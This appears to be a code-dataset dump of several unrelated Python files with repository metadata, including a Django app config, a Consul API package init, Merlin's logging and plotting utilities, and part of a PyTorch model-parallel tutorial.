shard_id=shard_id,
shard_count=shard_count,
token=self._token,
url=url,
)
self._shards[shard_id] = new_shard
start = time.monotonic()
await aio.first_completed(new_shard.start(), closing_event.wait())
end = time.monotonic()
if new_shard.is_alive:
_LOGGER.debug("shard %s started successfully in %.1fms", shard_id, (end - start) * 1_000)
return new_shard
raise errors.GatewayError(f"shard {shard_id} shut down immediately when starting")
| true
| true
|
f707ae782f2ab37d3669980273f149ae70d29ab3
| 880
|
py
|
Python
|
pipeline_plugins/apps.py
|
mmqzlj/bk-sops
|
eb1292d0d949197c4b3b69357b7d817f459dc7ac
|
[
"Apache-2.0"
] | 1
|
2019-12-23T07:23:35.000Z
|
2019-12-23T07:23:35.000Z
|
pipeline_plugins/apps.py
|
mmqzlj/bk-sops
|
eb1292d0d949197c4b3b69357b7d817f459dc7ac
|
[
"Apache-2.0"
] | 5
|
2020-02-12T02:55:56.000Z
|
2021-06-10T22:57:10.000Z
|
pipeline_plugins/apps.py
|
mmqzlj/bk-sops
|
eb1292d0d949197c4b3b69357b7d817f459dc7ac
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
"""
Tencent is pleased to support the open source community by making 蓝鲸智云PaaS平台社区版 (BlueKing PaaS Community
Edition) available.
Copyright (C) 2017-2019 THL A29 Limited, a Tencent company. All rights reserved.
Licensed under the MIT License (the "License"); you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://opensource.org/licenses/MIT
Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on
an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the
specific language governing permissions and limitations under the License.
"""
from __future__ import unicode_literals
from django.apps import AppConfig
class PipelinePluginsConfig(AppConfig):
name = 'pipeline_plugins'
| 41.904762
| 115
| 0.792045
|
from __future__ import unicode_literals
from django.apps import AppConfig
class PipelinePluginsConfig(AppConfig):
name = 'pipeline_plugins'
| true
| true
|
f707b2d689b6899a968f7f569001203c9440ef3b
| 73
|
py
|
Python
|
log.py
|
Windfisch/agario-frickel
|
04acf7e45d08878733b0d0a0d65f319f6d14d224
|
[
"BSD-3-Clause"
] | 2
|
2015-08-11T00:47:49.000Z
|
2016-03-05T13:09:12.000Z
|
log.py
|
Windfisch/agario-frickel
|
04acf7e45d08878733b0d0a0d65f319f6d14d224
|
[
"BSD-3-Clause"
] | 23
|
2015-08-10T11:11:05.000Z
|
2015-09-22T16:18:04.000Z
|
log.py
|
Windfisch/agario-frickel
|
04acf7e45d08878733b0d0a0d65f319f6d14d224
|
[
"BSD-3-Clause"
] | null | null | null |
logging = False
def log(string):
if logging:
print(string)
| 10.428571
| 21
| 0.60274
|
logging = False
def log(string):
if logging:
print(string)
| true
| true
|
f707b33898280eaac5416d3b674ceab08848bef6
| 579
|
py
|
Python
|
consulate/api/__init__.py
|
python-microservices/consulate
|
9d95a946b3a5c3095437801488cf84836d72192c
|
[
"BSD-3-Clause"
] | null | null | null |
consulate/api/__init__.py
|
python-microservices/consulate
|
9d95a946b3a5c3095437801488cf84836d72192c
|
[
"BSD-3-Clause"
] | null | null | null |
consulate/api/__init__.py
|
python-microservices/consulate
|
9d95a946b3a5c3095437801488cf84836d72192c
|
[
"BSD-3-Clause"
] | null | null | null |
"""
Consul API Endpoints
"""
from consulate.api.acl import ACL
from consulate.api.agent import Agent
from consulate.api.base import Response
from consulate.api.catalog import Catalog
from consulate.api.coordinate import Coordinate
from consulate.api.event import Event
from consulate.api.health import Health
from consulate.api.kv import KV
from consulate.api.lock import Lock
from consulate.api.session import Session
from consulate.api.status import Status
__all__ = ["ACL", "Agent", "Catalog", "Event", "Health", "KV", "Lock", "Session", "Status", "Response", "Coordinate"]
| 32.166667
| 117
| 0.780656
|
from consulate.api.acl import ACL
from consulate.api.agent import Agent
from consulate.api.base import Response
from consulate.api.catalog import Catalog
from consulate.api.coordinate import Coordinate
from consulate.api.event import Event
from consulate.api.health import Health
from consulate.api.kv import KV
from consulate.api.lock import Lock
from consulate.api.session import Session
from consulate.api.status import Status
__all__ = ["ACL", "Agent", "Catalog", "Event", "Health", "KV", "Lock", "Session", "Status", "Response", "Coordinate"]
| true
| true
|
f707b416f6ad86fb6c6a69d25bcc72f5f4890c66
| 14,050
|
py
|
Python
|
src/logplot/logging_plotting.py
|
G-Thor/merlin
|
33fa6e65ddb903ed5633ccb66c74d3e7c128667f
|
[
"Apache-2.0"
] | 1,305
|
2016-08-10T17:32:36.000Z
|
2022-03-29T08:23:34.000Z
|
src/logplot/logging_plotting.py
|
G-Thor/merlin
|
33fa6e65ddb903ed5633ccb66c74d3e7c128667f
|
[
"Apache-2.0"
] | 464
|
2016-08-15T16:09:12.000Z
|
2022-01-04T01:26:57.000Z
|
src/logplot/logging_plotting.py
|
G-Thor/merlin
|
33fa6e65ddb903ed5633ccb66c74d3e7c128667f
|
[
"Apache-2.0"
] | 508
|
2016-08-10T16:58:23.000Z
|
2022-03-23T06:52:06.000Z
|
################################################################################
# The Neural Network (NN) based Speech Synthesis System
# https://svn.ecdf.ed.ac.uk/repo/inf/dnn_tts/
#
# Centre for Speech Technology Research
# University of Edinburgh, UK
# Copyright (c) 2014-2015
# All Rights Reserved.
#
# The system as a whole and most of the files in it are distributed
# under the following copyright and conditions
#
# Permission is hereby granted, free of charge, to use and distribute
# this software and its documentation without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of this work, and to
# permit persons to whom this work is furnished to do so, subject to
# the following conditions:
#
# - Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# - Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided
# with the distribution.
# - The authors' names may not be used to endorse or promote products derived
# from this software without specific prior written permission.
#
# THE UNIVERSITY OF EDINBURGH AND THE CONTRIBUTORS TO THIS WORK
# DISCLAIM ALL WARRANTIES WITH REGARD TO THIS SOFTWARE, INCLUDING
# ALL IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS, IN NO EVENT
# SHALL THE UNIVERSITY OF EDINBURGH NOR THE CONTRIBUTORS BE LIABLE
# FOR ANY SPECIAL, INDIRECT OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
# WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN
# AN ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION,
# ARISING OUT OF OR IN CONNECTION WITH THE USE OR PERFORMANCE OF
# THIS SOFTWARE.
################################################################################
# NOTES
# still to consider: pygal, for HTML5 SVG plotting
import math
import string
import os
# this module provides the base classes that we specialise here
import logging # as logging
# for plotting
import matplotlib
# should make this user-configurable - TO DO later
# this line has to come before the import of matplotlib.pyplot
matplotlib.use('PDF')
import matplotlib.pyplot as plt
import pylab
from matplotlib.ticker import MultipleLocator, FormatStrFormatter
# matplotlib needs to be passed numpy arrays
import numpy
# for sorting tuples
from operator import itemgetter, attrgetter
# TO DO - this needs to be attached to the logging module so that it's available via config options
# class PlotHandler(logging.FileHandler):
# """A handler for saving plots to disk"""
# def __init__(self,filename):
# logging.FileHandler.__init__(self,filename, mode='a', encoding=None, delay=False)
class PlotWithData(object):
# a generic plot object that contains both the underlying data and the plot itself
# this class needs to be subclassed for each specialised type of plot that we want
# the underlying data for the plot - a dictionary of data series
# each series is a list of data points of arbitrary type (e.g., tuples, arrays, ..)
data=None
# the plot generated from these data
plot=None
def __init__(self,name):
# clear the data series
self.data={}
def add_data_point(self,series_name,data_point):
# if there is no data series with this name yet, create an empty one
if series_name not in self.data:
self.data[series_name]=[]
# append this data point (e.g., it might be a tuple (x,y) )
# don't worry about data type or sorting - that is not our concern here
self.data[series_name].append(data_point)
def sort_and_validate(self):
# only applied if the data points are tuples, such as (x,y) values
# TO DO: first check that each series is a list of tuples, and that they have the same number of elements
# this method checks that all data series
# 1. have the same length
# 2. are sorted in ascending order of x
# 3. have identical values in their x series
# there has to be at least one data series
try:
assert len(self.data) > 0
except AssertionError:
logger.critical('No data series found in plot')
raise
# check lengths are consistent, sort, then check x values are identical
l=-1
reference_x=None
# print "starting with self.data=",self.data
for series_name,data_points in self.data.items():
if l > 0:
assert l == len(data_points)
else:
l = len(data_points)
# sort by ascending x value
data_points.sort(key=itemgetter(0))
if reference_x:
assert reference_x == [seq[0] for seq in data_points]
else:
# extract a list of just the x values
reference_x = [seq[0] for seq in data_points]
# print "ending with self.data=",self.data
def generate_plot(self,**kwargs):
logger = logging.getLogger("plotting")
logger.error('Cannot generate a plot from abstract class: PlotWithData' )
# raise an exception here?
class MultipleSeriesPlot(PlotWithData):
def generate_plot(self,filename,title='',xlabel='',ylabel='',xlim=None,ylim=None):
logger = logging.getLogger("plotting")
logger.debug('MultipleSeriesPlot.generate_plot')
# a plot with one or more time series sharing a common x axis:
# e.g., the training error and the validation error plotted against epochs
# sort the data series and make sure they are consistent
self.sort_and_validate()
# if there is a plot already in existence, we will clear it and re-use it;
# this avoids creating extraneous figures which will stay in memory
# (even if we are no longer referencing them)
if self.plot:
self.plot.clf()
else:
# create a plot
self.plot = plt.figure()
splt = self.plot.add_subplot(1, 1, 1)
splt.set_title(title)
splt.set_xlabel(xlabel)
splt.set_ylabel(ylabel)
if xlim:
pylab.xlim(xlim)
if ylim:
pylab.ylim(ylim)
for series_name,data_points in self.data.items():
xpoints=numpy.asarray([seq[0] for seq in data_points])
ypoints=numpy.asarray([seq[1] for seq in data_points])
line, = splt.plot(xpoints, ypoints, '-', linewidth=2)
logger.debug('set_label for %s' % series_name)
line.set_label(series_name)
splt.legend()
# TO DO - better filename configuration for plots
self.plot.savefig(filename)
class SingleWeightMatrixPlot(PlotWithData):
def generate_plot(self, filename, title='', xlabel='', ylabel=''):
data_keys = list(self.data.keys())
key_num = len(data_keys)
self.plot = plt.figure()
if key_num == 1:
splt = self.plot.add_subplot(1, 1, 1)
im_data = splt.imshow(numpy.flipud(self.data[data_keys[0]][0]), origin='lower')
splt.set_xlabel(xlabel)
splt.set_ylabel(ylabel)
splt.set_title(title)
else: ## still plotting multiple image in one figure still has problem. the visualization is not good
logger.error('no supported yet')
self.plot.colorbar(im_data)
self.plot.savefig(filename) #, bbox_inches='tight'
#class MultipleLinesPlot(PlotWithData):
# def generate_plot(self, filename, title='', xlabel='', ylabel=''):
class LoggerPlotter(logging.getLoggerClass()):
"""Based on the built-in logging class, with added capabilities including plotting"""
# a dictionary to store all generated plots
# keys are plot names
# values are
plots ={}
# where the plots will be saved - a directory
plot_path='/tmp' # default location
def __init__(self,name):
# initialise the logging parent class
# (should really use 'super' here I think, but that fails - perhaps because the built in logger class is not derived from 'object' ?)
logging.Logger.__init__(self,name)
def set_plot_path(self,path):
self.plot_path = path
def remove_all_plots(self):
self.plots={}
def create_plot(self,plot_name,plot_object):
self.plots[plot_name] = plot_object(plot_name)
def add_plot_point(self,plot_name,series_name,data_point):
# add a data point to a named plot
if plot_name not in self.plots:
self.plots[plot_name] = PlotWithData(plot_name)
self.plots[plot_name].add_data_point(series_name,data_point)
def save_plot(self,plot_name,**kwargs):
logger = logging.getLogger("plotting")
if plot_name not in self.plots:
logger.warn('Tried to generate a plot called %s that does not exist' % plot_name)
# raise an exception here?
else:
# # the filename to save to is known by the handler, which needs to be assigned to this logger
# # look at the handlers attached to this logger instance
# ph=None
# for h in self.handlers:
# # we want an instance of a PlotHandler - we'll take the first one we find
# # (behaviour will be unpredictable if there is more than one handler of this type)
# if isinstance(h,PlotHandler):
# ph=h
# break
# if ph:
# TO DO - need to be sure of safe file names
if not os.path.isdir(self.plot_path):
os.makedirs(self.plot_path)
filename = self.plot_path + "/" + string.replace(plot_name, " ", "_") + ".pdf"
logger.info('Generating a plot in file %s' % filename)
self.plots[plot_name].generate_plot(filename,**kwargs)
# else:
# logger.warn('No handler of type PlotHandler is attached to this logger - cannot save plots')
class ColouredFormatter(logging.Formatter):
# colourising formatter adapted from an answer to this question on Stack Overflow
# http://stackoverflow.com/questions/384076/how-can-i-color-python-logging-output
BLACK, RED, GREEN, YELLOW, BLUE, MAGENTA, CYAN, WHITE = list(range(8))
COLOURS = {
'DEBUG': BLUE,
'INFO': GREEN,
'WARNING': YELLOW,
'ERROR': RED,
'CRITICAL': MAGENTA
}
max_level_name_width = '8'
# terminal escape sequences
RESET_SEQ = "\033[0m"
COLOUR_SEQ = "\033[1;%dm"
BOLD_SEQ = "\033[1m"
def format(self, record):
if record.levelname in self.COLOURS:
# pad to fixed width - currently hardwired, should make this dynamic
# maximum width of level names, which is the 8 characters of "CRITICAL"
fixed_width_levelname = '{0:8s}'.format(record.levelname)
record.name = '{0:8s}'.format(record.name)
# The background is set with 40 plus the number of the color, and the foreground with 30
record.levelname = self.COLOUR_SEQ % (30 + self.COLOURS[record.levelname]) + fixed_width_levelname + self.RESET_SEQ
return logging.Formatter.format(self, record)
def factory(fmt, datefmt):
default = logging.Formatter(fmt, datefmt)
return ColouredFormatter(default)
if __name__ == '__main__':
# some simple tests
# tell the built-in logger module to use our custom class when instantiating any new logger
logging.setLoggerClass(LoggerPlotter)
logger = logging.getLogger("test_logger")
logger.setLevel(logging.DEBUG)
# a console handler
ch = logging.StreamHandler()
ch.setLevel(logging.DEBUG)
formatter = ColouredFormatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')
ch.setFormatter(formatter)
logger.addHandler(ch)
print("testing the logging code")
logger.debug('A DEBUG message')
logger.info('A INFO message')
logger.warning('A WARN message')
logger.error('A ERROR message')
logger.critical('A CRITICAL message')
plotlogger = logging.getLogger("plotting")
plotlogger.setLevel(logging.DEBUG)
# handler for plotting logger - will write only to console
plotlogger.addHandler(ch)
# # need a handler which will control where to save plots
# ph = PlotHandler("/tmp/plot_test/testing.pdf")
# logger.addHandler(ph)
print("testing the plotting code")
# the first argument is just a key for referring to this plot within the code
# the second argument says what kind of plot we will be making
plotlogger.set_plot_path("./tmp")
logger.create_plot('test plot',MultipleTimeSeriesPlot)
plotlogger.add_plot_point('test plot','validation',(1,4))
plotlogger.add_plot_point('test plot','validation',(3,2))
plotlogger.add_plot_point('test plot','validation',(2,3))
plotlogger.add_plot_point('test plot','validation',(4,3))
plotlogger.add_plot_point('test plot','training',(1,3))
plotlogger.add_plot_point('test plot','training',(3,1))
plotlogger.add_plot_point('test plot','training',(2,2))
plotlogger.add_plot_point('test plot','training',(4,4))
plotlogger.save_plot('test plot',title='Training and validation error',xlabel='epochs',ylabel='error')
weights = [[1, 2, 3, 3], [1, 1, 2, 1], [2, 1, 2, 2]]
logger.create_plot('activation weight', SingleWeightMatrixPlot)
plotlogger.add_plot_point('activation weight', 'weight1', weights)
plotlogger.add_plot_point('activation weight', 'weight2', weights)
plotlogger.add_plot_point('activation weight', 'weight3', weights)
plotlogger.save_plot('activation weight', title='weight', xlabel='dimension', ylabel='dimension')
| 37.87062
| 141
| 0.653737
|
# from this software without specific prior written permission.
#
# THE UNIVERSITY OF EDINBURGH AND THE CONTRIBUTORS TO THIS WORK
# DISCLAIM ALL WARRANTIES WITH REGARD TO THIS SOFTWARE, INCLUDING
# ALL IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS, IN NO EVENT
# SHALL THE UNIVERSITY OF EDINBURGH NOR THE CONTRIBUTORS BE LIABLE
# FOR ANY SPECIAL, INDIRECT OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
# WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN
# AN ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION,
# ARISING OUT OF OR IN CONNECTION WITH THE USE OR PERFORMANCE OF
# THIS SOFTWARE.
################################################################################
# NOTES
# still to consider: pygal, for HTML5 SVG plotting
import math
import string
import os
# this module provides the base classes that we specialise here
import logging # as logging
# for plotting
import matplotlib
# should make this user-configurable - TO DO later
# this line has to come before the import of matplotlib.pyplot
matplotlib.use('PDF')
import matplotlib.pyplot as plt
import pylab
from matplotlib.ticker import MultipleLocator, FormatStrFormatter
# matplotlib needs to be passed numpy arrays
import numpy
# for sorting tuples
from operator import itemgetter, attrgetter
# TO DO - this needs to be attached to the logging module so that it's available via config options
class PlotWithData(object):
data=None
plot=None
def __init__(self,name):
self.data={}
def add_data_point(self,series_name,data_point):
if series_name not in self.data:
self.data[series_name]=[]
self.data[series_name].append(data_point)
def sort_and_validate(self):
# only applied if the data points are tuples, such as (x,y) values
# TO DO: first check that each series is a list of tuples, and that they have the same number of elements
# this method checks that all data series
# 1. have the same length
# 2. are sorted in ascending order of x
# 3. have identical values in their x series
# there has to be at least one data series
try:
assert len(self.data) > 0
except AssertionError:
logger.critical('No data series found in plot')
raise
# check lengths are consistent, sort, then check x values are identical
l=-1
reference_x=None
# print "starting with self.data=",self.data
for series_name,data_points in self.data.items():
if l > 0:
assert l == len(data_points)
else:
l = len(data_points)
# sort by ascending x value
data_points.sort(key=itemgetter(0))
if reference_x:
assert reference_x == [seq[0] for seq in data_points]
else:
# extract a list of just the x values
reference_x = [seq[0] for seq in data_points]
# print "ending with self.data=",self.data
def generate_plot(self,**kwargs):
logger = logging.getLogger("plotting")
logger.error('Cannot generate a plot from abstract class: PlotWithData' )
# raise an exception here?
class MultipleSeriesPlot(PlotWithData):
def generate_plot(self,filename,title='',xlabel='',ylabel='',xlim=None,ylim=None):
logger = logging.getLogger("plotting")
logger.debug('MultipleSeriesPlot.generate_plot')
# a plot with one or more time series sharing a common x axis:
# e.g., the training error and the validation error plotted against epochs
# sort the data series and make sure they are consistent
self.sort_and_validate()
# if there is a plot already in existence, we will clear it and re-use it;
# this avoids creating extraneous figures which will stay in memory
# (even if we are no longer referencing them)
if self.plot:
self.plot.clf()
else:
# create a plot
self.plot = plt.figure()
splt = self.plot.add_subplot(1, 1, 1)
splt.set_title(title)
splt.set_xlabel(xlabel)
splt.set_ylabel(ylabel)
if xlim:
pylab.xlim(xlim)
if ylim:
pylab.ylim(ylim)
for series_name,data_points in self.data.items():
xpoints=numpy.asarray([seq[0] for seq in data_points])
ypoints=numpy.asarray([seq[1] for seq in data_points])
line, = splt.plot(xpoints, ypoints, '-', linewidth=2)
logger.debug('set_label for %s' % series_name)
line.set_label(series_name)
splt.legend()
# TO DO - better filename configuration for plots
self.plot.savefig(filename)
class SingleWeightMatrixPlot(PlotWithData):
def generate_plot(self, filename, title='', xlabel='', ylabel=''):
data_keys = list(self.data.keys())
key_num = len(data_keys)
self.plot = plt.figure()
if key_num == 1:
splt = self.plot.add_subplot(1, 1, 1)
im_data = splt.imshow(numpy.flipud(self.data[data_keys[0]][0]), origin='lower')
splt.set_xlabel(xlabel)
splt.set_ylabel(ylabel)
splt.set_title(title)
else: ## still plotting multiple image in one figure still has problem. the visualization is not good
logger.error('no supported yet')
self.plot.colorbar(im_data)
self.plot.savefig(filename) #, bbox_inches='tight'
#class MultipleLinesPlot(PlotWithData):
# def generate_plot(self, filename, title='', xlabel='', ylabel=''):
class LoggerPlotter(logging.getLoggerClass()):
# a dictionary to store all generated plots
# keys are plot names
# values are
plots ={}
# where the plots will be saved - a directory
plot_path='/tmp' # default location
def __init__(self,name):
# initialise the logging parent class
# (should really use 'super' here I think, but that fails - perhaps because the built in logger class is not derived from 'object' ?)
logging.Logger.__init__(self,name)
def set_plot_path(self,path):
self.plot_path = path
def remove_all_plots(self):
self.plots={}
def create_plot(self,plot_name,plot_object):
self.plots[plot_name] = plot_object(plot_name)
def add_plot_point(self,plot_name,series_name,data_point):
# add a data point to a named plot
if plot_name not in self.plots:
self.plots[plot_name] = PlotWithData(plot_name)
self.plots[plot_name].add_data_point(series_name,data_point)
def save_plot(self,plot_name,**kwargs):
logger = logging.getLogger("plotting")
if plot_name not in self.plots:
logger.warn('Tried to generate a plot called %s that does not exist' % plot_name)
# raise an exception here?
else:
# # the filename to save to is known by the handler, which needs to be assigned to this logger
# # look at the handlers attached to this logger instance
# ph=None
# for h in self.handlers:
# # we want an instance of a PlotHandler - we'll take the first one we find
if not os.path.isdir(self.plot_path):
os.makedirs(self.plot_path)
filename = self.plot_path + "/" + string.replace(plot_name, " ", "_") + ".pdf"
logger.info('Generating a plot in file %s' % filename)
self.plots[plot_name].generate_plot(filename,**kwargs)
class ColouredFormatter(logging.Formatter):
BLACK, RED, GREEN, YELLOW, BLUE, MAGENTA, CYAN, WHITE = list(range(8))
COLOURS = {
'DEBUG': BLUE,
'INFO': GREEN,
'WARNING': YELLOW,
'ERROR': RED,
'CRITICAL': MAGENTA
}
max_level_name_width = '8'
RESET_SEQ = "\033[0m"
COLOUR_SEQ = "\033[1;%dm"
BOLD_SEQ = "\033[1m"
def format(self, record):
if record.levelname in self.COLOURS:
fixed_width_levelname = '{0:8s}'.format(record.levelname)
record.name = '{0:8s}'.format(record.name)
record.levelname = self.COLOUR_SEQ % (30 + self.COLOURS[record.levelname]) + fixed_width_levelname + self.RESET_SEQ
return logging.Formatter.format(self, record)
def factory(fmt, datefmt):
default = logging.Formatter(fmt, datefmt)
return ColouredFormatter(default)
if __name__ == '__main__':
logging.setLoggerClass(LoggerPlotter)
logger = logging.getLogger("test_logger")
logger.setLevel(logging.DEBUG)
ch = logging.StreamHandler()
ch.setLevel(logging.DEBUG)
formatter = ColouredFormatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')
ch.setFormatter(formatter)
logger.addHandler(ch)
print("testing the logging code")
logger.debug('A DEBUG message')
logger.info('A INFO message')
logger.warning('A WARN message')
logger.error('A ERROR message')
logger.critical('A CRITICAL message')
plotlogger = logging.getLogger("plotting")
plotlogger.setLevel(logging.DEBUG)
plotlogger.addHandler(ch)
print("testing the plotting code")
plotlogger.set_plot_path("./tmp")
logger.create_plot('test plot',MultipleTimeSeriesPlot)
plotlogger.add_plot_point('test plot','validation',(1,4))
plotlogger.add_plot_point('test plot','validation',(3,2))
plotlogger.add_plot_point('test plot','validation',(2,3))
plotlogger.add_plot_point('test plot','validation',(4,3))
plotlogger.add_plot_point('test plot','training',(1,3))
plotlogger.add_plot_point('test plot','training',(3,1))
plotlogger.add_plot_point('test plot','training',(2,2))
plotlogger.add_plot_point('test plot','training',(4,4))
plotlogger.save_plot('test plot',title='Training and validation error',xlabel='epochs',ylabel='error')
weights = [[1, 2, 3, 3], [1, 1, 2, 1], [2, 1, 2, 2]]
logger.create_plot('activation weight', SingleWeightMatrixPlot)
plotlogger.add_plot_point('activation weight', 'weight1', weights)
plotlogger.add_plot_point('activation weight', 'weight2', weights)
plotlogger.add_plot_point('activation weight', 'weight3', weights)
plotlogger.save_plot('activation weight', title='weight', xlabel='dimension', ylabel='dimension')
| true
| true
|
f707b500c5ee72beaed596d031c6f55b8804b116
| 13,617
|
py
|
Python
|
intermediate_source/model_parallel_tutorial.py
|
Mirwaisse/tutorials
|
c1523d3f16d6a4bd370261129c75a4383c5491d9
|
[
"BSD-3-Clause"
] | 1
|
2022-02-23T03:13:50.000Z
|
2022-02-23T03:13:50.000Z
|
intermediate_source/model_parallel_tutorial.py
|
MaureenZOU/tutorials
|
18ec63ce8c85ef11af92685cc1436fd3034efc74
|
[
"BSD-3-Clause"
] | 2
|
2022-01-13T04:11:34.000Z
|
2022-03-12T01:04:00.000Z
|
intermediate_source/model_parallel_tutorial.py
|
MaureenZOU/tutorials
|
18ec63ce8c85ef11af92685cc1436fd3034efc74
|
[
"BSD-3-Clause"
] | 2
|
2020-02-22T21:33:40.000Z
|
2021-08-19T02:06:56.000Z
|
# -*- coding: utf-8 -*-
"""
Model Parallel Best Practices
*************************************************************
**Author**: `Shen Li <https://mrshenli.github.io/>`_
Data parallel and model parallel are widely-used in distributed training
techniques. Previous posts have explained how to use
`DataParallel <https://pytorch.org/tutorials/beginner/blitz/data_parallel_tutorial.html>`_
to train a neural network on multiple GPUs. ``DataParallel`` replicates the
same model to all GPUs, where each GPU consumes a different partition of the
input data. Although it can significantly accelerate the training process, it
does not work for some use cases where the model is too large to fit into a
single GPU. This post shows how to solve that problem by using model parallel
and also shares some insights on how to speed up model parallel training.
The high-level idea of model parallel is to place different sub-networks of a
model onto different devices, and implement the ``forward`` method accordingly
to move intermediate outputs across devices. As only part of a model operates
on any individual device, a set of devices can collectively serve a larger
model. In this post, we will not try to construct huge models and squeeze them
into a limited number of GPUs. Instead, this post focuses on showing the idea
of model parallel. It is up to the readers to apply the ideas to real-world
applications.
**Recommended Reading:**
- https://pytorch.org/ For installation instructions
- :doc:`/beginner/blitz/data_parallel_tutorial` Single-Machine Data Parallel
- :doc:`/intermediate/ddp_tutorial` Combine Distributed Data Parallel and Model Parallel
"""
######################################################################
# Basic Usage
# =======================
#
# Let us start with a toy model that contains two linear layers. To run this
# model on two GPUs, simply put each linear layer on a different GPU, and move
# inputs and intermediate outputs to match the layer devices accordingly.
import torch
import torch.nn as nn
import torch.optim as optim
class ToyModel(nn.Module):
def __init__(self):
super(ToyModel, self).__init__()
self.net1 = torch.nn.Linear(10, 10).to('cuda:0')
self.relu = torch.nn.ReLU()
self.net2 = torch.nn.Linear(10, 5).to('cuda:1')
def forward(self, x):
x = self.relu(self.net1(x.to('cuda:0')))
return self.net2(x.to('cuda:1'))
######################################################################
# Note that, the above ``ToyModel`` looks very similar to how one would
# implement it on a single GPU, except the five ``to(device)`` calls which
# place linear layers and tensors on proper devices. That is the only place in
# the model that requires changes. The ``backward()`` and ``torch.optim`` will
# automatically take care of gradients as if the model is on one GPU. You only
# need to make sure that the labels are on the same device as the outputs when
# calling the loss function.
model = ToyModel()
loss_fn = nn.MSELoss()
optimizer = optim.SGD(model.parameters(), lr=0.001)
optimizer.zero_grad()
outputs = model(torch.randn(20, 10))
labels = torch.randn(20, 5).to('cuda:1')
loss_fn(outputs, labels).backward()
optimizer.step()
######################################################################
# Apply Model Parallel to Existing Modules
# =======================
#
# It is also possible to run an existing single-GPU module on multiple GPUs
# with just a few lines of changes. The code below shows how to decompose
# ``torchvision.models.reset50()`` to two GPUs. The idea is to inherit from
# the existing ``ResNet`` module, and split the layers to two GPUs during
# construction. Then, override the ``forward`` method to stitch two
# sub-networks by moving the intermediate outputs accordingly.
from torchvision.models.resnet import ResNet, Bottleneck
num_classes = 1000
class ModelParallelResNet50(ResNet):
def __init__(self, *args, **kwargs):
super(ModelParallelResNet50, self).__init__(
Bottleneck, [3, 4, 6, 3], num_classes=num_classes, *args, **kwargs)
self.seq1 = nn.Sequential(
self.conv1,
self.bn1,
self.relu,
self.maxpool,
self.layer1,
self.layer2
).to('cuda:0')
self.seq2 = nn.Sequential(
self.layer3,
self.layer4,
self.avgpool,
).to('cuda:1')
self.fc.to('cuda:1')
def forward(self, x):
x = self.seq2(self.seq1(x).to('cuda:1'))
return self.fc(x.view(x.size(0), -1))
######################################################################
# The above implementation solves the problem for cases where the model is too
# large to fit into a single GPU. However, you might have already noticed that
# it will be slower than running it on a single GPU if your model fits. It is
# because, at any point in time, only one of the two GPUs are working, while
# the other one is sitting there doing nothing. The performance further
# deteriorates as the intermediate outputs need to be copied from ``cuda:0`` to
# ``cuda:1`` between ``layer2`` and ``layer3``.
#
# Let us run an experiment to get a more quantitative view of the execution
# time. In this experiment, we train ``ModelParallelResNet50`` and the existing
# ``torchvision.models.reset50()`` by running random inputs and labels through
# them. After the training, the models will not produce any useful predictions,
# but we can get a reasonable understanding of the execution times.
import torchvision.models as models
num_batches = 3
batch_size = 120
image_w = 128
image_h = 128
def train(model):
model.train(True)
loss_fn = nn.MSELoss()
optimizer = optim.SGD(model.parameters(), lr=0.001)
one_hot_indices = torch.LongTensor(batch_size) \
.random_(0, num_classes) \
.view(batch_size, 1)
for _ in range(num_batches):
# generate random inputs and labels
inputs = torch.randn(batch_size, 3, image_w, image_h)
labels = torch.zeros(batch_size, num_classes) \
.scatter_(1, one_hot_indices, 1)
# run forward pass
optimizer.zero_grad()
outputs = model(inputs.to('cuda:0'))
# run backward pass
labels = labels.to(outputs.device)
loss_fn(outputs, labels).backward()
optimizer.step()
######################################################################
# The ``train(model)`` method above uses ``nn.MSELoss`` as the loss function,
# and ``optim.SGD`` as the optimizer. It mimics training on ``128 X 128``
# images which are organized into 3 batches where each batch contains 120
# images. Then, we use ``timeit`` to run the ``train(model)`` method 10 times
# and plot the execution times with standard deviations.
import matplotlib.pyplot as plt
plt.switch_backend('Agg')
import numpy as np
import timeit
num_repeat = 10
stmt = "train(model)"
setup = "model = ModelParallelResNet50()"
# globals arg is only available in Python 3. In Python 2, use the following
# import __builtin__
# __builtin__.__dict__.update(locals())
mp_run_times = timeit.repeat(
stmt, setup, number=1, repeat=num_repeat, globals=globals())
mp_mean, mp_std = np.mean(mp_run_times), np.std(mp_run_times)
setup = "import torchvision.models as models;" + \
"model = models.resnet50(num_classes=num_classes).to('cuda:0')"
rn_run_times = timeit.repeat(
stmt, setup, number=1, repeat=num_repeat, globals=globals())
rn_mean, rn_std = np.mean(rn_run_times), np.std(rn_run_times)
def plot(means, stds, labels, fig_name):
fig, ax = plt.subplots()
ax.bar(np.arange(len(means)), means, yerr=stds,
align='center', alpha=0.5, ecolor='red', capsize=10, width=0.6)
ax.set_ylabel('ResNet50 Execution Time (Second)')
ax.set_xticks(np.arange(len(means)))
ax.set_xticklabels(labels)
ax.yaxis.grid(True)
plt.tight_layout()
plt.savefig(fig_name)
plt.close(fig)
plot([mp_mean, rn_mean],
[mp_std, rn_std],
['Model Parallel', 'Single GPU'],
'mp_vs_rn.png')
######################################################################
#
# .. figure:: /_static/img/model-parallel-images/mp_vs_rn.png
# :alt:
#
# The result shows that the execution time of model parallel implementation is
# ``4.02/3.75-1=7%`` longer than the existing single-GPU implementation. So we
# can conclude there is roughly 7% overhead in copying tensors back and forth
# across the GPUs. There are rooms for improvements, as we know one of the two
# GPUs is sitting idle throughout the execution. One option is to further
